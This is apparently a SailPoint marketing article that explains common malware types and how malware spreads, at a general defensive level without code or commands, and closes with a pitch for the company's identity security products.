What Is Malware?
Malware, also known as malicious software, is commonly used to infiltrate, harm, or extract information from computer systems. Cybercriminals use malware for everything from stealing data, deleting files, and recording keystrokes to compromising login credentials. This makes malware a very powerful tool and a threat that every organization needs to address.
Once a system is infected with malware, threat actors can control that system extensively, if not fully. Additionally, they’re able to access infected devices whenever they want. This is especially a concern during off-hours, when many organizations don’t have the same level of coverage by security teams.
Malware attacks occur every 11 seconds. To help protect your organization, start by learning about the various malware types.
Types of Malware
Malware comes in many forms. Below, we’ve comprised a list of the most common types of malware families.
A computer virus mimics a real virus by replicating itself across various components of systems via malicious code. More often than not, the computer virus itself is inserted via a software program or component within the system. This makes the process of removing the virus difficult, as eradicating the original source of the virus may cause the entire system to fail as well.
To successfully eliminate further damage from a virus, it must be quarantined; then, further replication patterns can be blocked, and it can be completely removed from the system.
Computer worms are typically self-replicating malicious programs that spread by cloning themselves. These are especially dangerous because end-user interaction is not required to successfully infect a network.
Ransomware is exactly what it sounds like: a ransom-based malware that locks users out of files and systems until the ransom is paid. Even if organizations pay the ransom, they may not regain access to systems or data. Ransomware attacks are becoming more prevalent and have evolved into double-extortion schemes—with attackers also stealing sensitive data and threatening to leak it if the ransom is not met.
Keyloggers are keystroke-monitoring malware (or standard software in some cases) that enables outsiders to track the user’s every keystroke. Some keyloggers have legitimate purposes (such as employers monitoring activities for security or other purposes), but in the wrong hands, they put the enterprise at risk of data theft and other malicious activities.
A “trojan horse” is a reference to the old battle tool during the Trojan War, when Greek armies filled wooden horses with soldiers to infiltrate and create additional entry points for other soldiers to overtake enemy fortresses.
The same concept applies in cyber warfare. A digital trojan horse is often disguised as a form of legitimate software and is distributed via email links, benign-looking applications, or even a social engineering attempt. From there, trojan horses open backdoors for attackers to access as many areas of a company’s digital infrastructure as possible.
Spyware, or spying malware, is utilized by those with nefarious intent to spy on victims and access data for the attackers’ benefit. The purpose of spyware is to collect personally identifying information (PII), which can then be monetized or used to access additional sensitive data.
While backdoors certainly have some merit to help legitimate users regain access to certain software or programs they’ve subscribed to, they can be exploited by those with malicious purposes. Many technology vendors allow backdoors for internal purposes, but if these backdoors fall into the wrong hands, the implications can be severe.
Fileless malware allows attackers to gain access via operating systems. Think APIs, registry keys, or scheduled tasks. The attackers can simply blend in within an existing script or protocol to remain hidden for an extended period of time. This process also makes detection and mitigation challenging from a cybersecurity perspective.
Anyone browsing online has likely encountered adware, even with a pop-up blocker enabled. Adware most commonly redirects web surfers to another website that offers a similar product. Additionally, attackers use adware to generate income through online advertising services such as Google’s AdSense.
Malvertising is a form of malicious advertising that poses as one thing, but is actually an entirely different product: malware. Most “sketchy-looking” advertisements are associated with something malicious. Clicking on a malicious advertisement injects malware into the user’s system, giving attackers control of the device.
Rootkits are a form of malware that overtake the administrative access points of a system while avoiding detection. This process can create a wide array of problems for system administrators, locking them out of their systems and taking away any control over them. Since rootkits function at the operating system level, they have a much stronger functionality than some other forms of malware.
Bots and Botnets
Bots and botnets have the ability to combine trojan horses, worms, and viruses to overload a system with automated attacks. This near-constant barrage of attacks can take down some of the most powerful cybersecurity safeguards if organizations haven’t prepared for it appropriately. Distributed denial of service (DDoS) attacks are an example of botnets; when executed by nefarious professionals, they can take a system or website down for an extended period of time.
Random-Access Memory (RAM) Scrapers
RAM scrapers mine data temporarily stored in random access memory (hence the name, RAM scraper). This type of malware focuses on RAM storage within sensitive devices (e.g., point-of-sale systems) where data such as financial information is briefly transferred unencrypted.
Mobile malware is just that: malware targeting mobile devices. Often, “jailbroken” phones are more susceptible to these types of malware attacks because they lack security protections that are installed on mobile devices by default.
How Does Malware Infiltrate and Spread?
Malware can enter and spread throughout a system, network, or device in a variety of ways. The following is a list of most common methods.
A vulnerability can be anything from an unpatched area of a system, to an employee unaware of social engineering, to physical access of unsecured data centers.
Threat actors frequently exploit vulnerabilities to gain initial access into an organization.
As mentioned earlier, backdoors pose a great risk for those with malicious intent. Backdoors can be utilized by attackers to a great extent and for a long period of time. Many times, the security administrators don’t realize an intruder gained access through a backdoor until it’s too late.
Enterprises must create as many barriers and obstacles as possible to keep attackers out. While a flat network saves the cost of extra hardware such as routers, it doesn’t allow organizations to control traffic flow and implement cybersecurity controls such as segmentation.
Drive-by downloads typically happen when a user unknowingly encounters malware by visiting infected websites. This type of attack doesn’t require any user action beyond visiting the compromised web page, making it especially dangerous.
Hybrid threats combine multiple styles of malware into one to distract cybersecurity systems from detecting the true threats at hand. This technique attempts to circumvent detection by hiding true malware intent without the user realizing what’s actually occurring.
Enabling Cybersecurity with SailPoint
With SailPoint, enterprises can feel more confident that their organization’s cybersecurity program is enabled by some of the best protocols available. Learn how we can best align with your company’s identity security, identity governance, and other cybersecurity goals.
You might also be interested in:
Take control of your cloud platform.
Learn more about SailPoint Identity Security.